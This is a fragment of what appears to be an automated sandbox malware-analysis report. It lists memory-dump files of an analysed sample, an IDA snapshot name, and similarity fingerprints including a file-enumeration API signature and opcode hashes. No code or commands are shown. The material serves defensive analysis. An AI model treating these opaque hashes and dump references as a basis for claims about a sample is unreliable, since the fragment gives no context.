                                        • Associated: 00000000.00000002.1844433132.000000000050C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.000000000061D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.0000000000629000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.000000000064E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.00000000007B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000945000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A44000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A5F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844839394.0000000000A60000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844940075.0000000000BF8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844954135.0000000000BF9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcat$Find$File$CloseFirstFolderNextPathwsprintf
                                        • String ID:
                                        • API String ID: 2667927680-0
                                        • Opcode ID: 5f073e321dda448b2550e0a2395f7bd0204e484bee4adbf5afd314a5b4fa02ef
                                        • Instruction ID: 2e16a00f86d62abe8de37b1e0e345b3f26d15fe3f831329ade5473fe0031f608
                                        • Opcode Fuzzy Hash: 5f073e321dda448b2550e0a2395f7bd0204e484bee4adbf5afd314a5b4fa02ef
                                        • Instruction Fuzzy Hash: B321B8B6900208ABCB14E761EC56FFD333CAB94300F00865DB75556191EE7CAAC8CB99